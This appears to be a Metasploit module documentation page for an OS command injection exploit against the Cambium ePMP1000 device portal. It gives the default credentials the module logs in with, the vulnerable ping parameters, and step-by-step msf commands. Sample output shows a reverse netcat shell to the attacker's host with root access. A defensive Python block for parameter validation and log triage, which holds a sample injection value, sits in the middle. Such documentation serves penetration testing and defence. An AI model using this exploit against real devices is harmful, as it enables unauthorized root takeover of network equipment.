metasploit-gs/documentation/modules/exploit/linux/http/epmp1000_ping_cmd_shell.md

2017-12-18 16:47:43 -06:00
This module exploits an OS command injection vulnerability in the Cambium ePMP1000 device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to set up a reverse netcat shell.
This module injects the payload into the 'packets_num' parameter. Alternatively, a second vulnerable parameter, 'ping_ip', can also be used.
Note: `cmd/unix/reverse_netcat` is the only payload that seems to work and is stable. After the session is opened, there may be a slight delay in the response to the first command; there are no delays in the responses to subsequent commands. It is recommended to use `exploit -j`.
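As an added, defender-side example (not code from this module or from Cambium), the following shows the server-side allow-list check the two ping-page parameters named above should have been subject to, plus a triage helper run over constructed access-log lines. The endpoint path, the log lines and the packet-count bound are assumptions; only the parameter names come from this page.

```python
# Added example: allow-list validation for the ePMP1000 ping parameters
# 'packets_num' and 'ping_ip', and a log triage helper built on it.
import ipaddress
import re
from urllib.parse import parse_qs, urlparse

# Metacharacters that let a value escape a shell-composed "ping" command line.
SHELL_META = re.compile(r"[;&|`$<>\n\r(){}\\'\"]")
MAX_PACKETS = 100  # assumed upper bound for a sane ping count


def validate_ping_params(params):
    """Return a list of findings; an empty list means the request is acceptable.

    params: dict of parameter name -> value, as the CGI handler would see it.
    """
    findings = []
    num = params.get("packets_num", "")
    if not re.fullmatch(r"[1-9][0-9]{0,2}", num) or int(num) > MAX_PACKETS:
        findings.append(f"packets_num rejected: {num!r}")
    ip = params.get("ping_ip", "")
    try:
        ipaddress.ip_address(ip)
    except ValueError:
        findings.append(f"ping_ip rejected: {ip!r}")
    return findings


def triage_request_line(line):
    """Classify one access-log request line for the ping endpoint as
    'clean', 'invalid' (fails the allow-list) or 'injection' (a ping
    parameter carries shell metacharacters); the last class is worth alerting on.
    """
    path = line.split('"')[1].split()[1]  # the URL inside "GET /path HTTP/1.1"
    raw = parse_qs(urlparse(path).query, keep_blank_values=True)
    params = {k: v[0] for k, v in raw.items()}
    watched = ("packets_num", "ping_ip")
    if any(SHELL_META.search(v) for k, v in params.items() if k in watched):
        return "injection"
    return "invalid" if validate_ping_params(params) else "clean"


# Constructed sample log lines (not captured from a real device); the
# /cgi-bin/ping.cgi path is an assumption, not the device's real endpoint.
SAMPLE_LOG = [
    '192.168.0.104 - - [02/Dec/2017:06:07:58 +0700] "GET /cgi-bin/ping.cgi?ping_ip=192.168.0.1&packets_num=4 HTTP/1.1" 200 512',
    '192.168.0.104 - - [02/Dec/2017:06:07:59 +0700] "GET /cgi-bin/ping.cgi?ping_ip=192.168.0.1&packets_num=4%3Bid HTTP/1.1" 200 640',
    '192.168.0.104 - - [02/Dec/2017:06:08:00 +0700] "GET /cgi-bin/ping.cgi?ping_ip=not-an-ip&packets_num=4 HTTP/1.1" 200 300',
]


def triage_log(lines):
    return [triage_request_line(line) for line in lines]
```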
## Verification Steps
1. Do: ```use exploit/unix/http/epmp1000_ping_cmd_shell```
2. Do: ```set RHOST [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```set LHOST [IP]```
5. Do: ```exploit -j```
## Sample Output
```
msf > use exploit/unix/http/epmp1000_ping_cmd_shell
msf exploit(epmp1000_ping_cmd_shell) > set RHOST 192.168.0.2
msf exploit(epmp1000_ping_cmd_shell) > set RPORT 80
msf exploit(epmp1000_ping_cmd_shell) > set LHOST 192.168.0.104
msf exploit(epmp1000_ping_cmd_shell) > exploit -j
[*] Started reverse TCP handler on 192.168.0.104:4444
[+] SUCCESSFUL LOGIN - 192.168.0.2:80 - "installer":"installer"
[*] Sending payload...
[*] Command shell session 10 opened (192.168.0.104:4444 -> 192.168.0.2:43594) at 2017-12-02 06:08:00 +0700
msf exploit(epmp1000_ping_cmd_shell) > sessions -l

Active sessions
===============

  Id  Type            Information  Connection
  --  ----            -----------  ----------
  10  shell cmd/unix               192.168.0.104:4444 -> 192.168.0.2:43594 (192.168.0.2)

msf exploit(epmp1000_ping_cmd_shell) > sessions -i 10
[*] Starting interaction with 10...

id
uid=0(root) gid=0(root)
```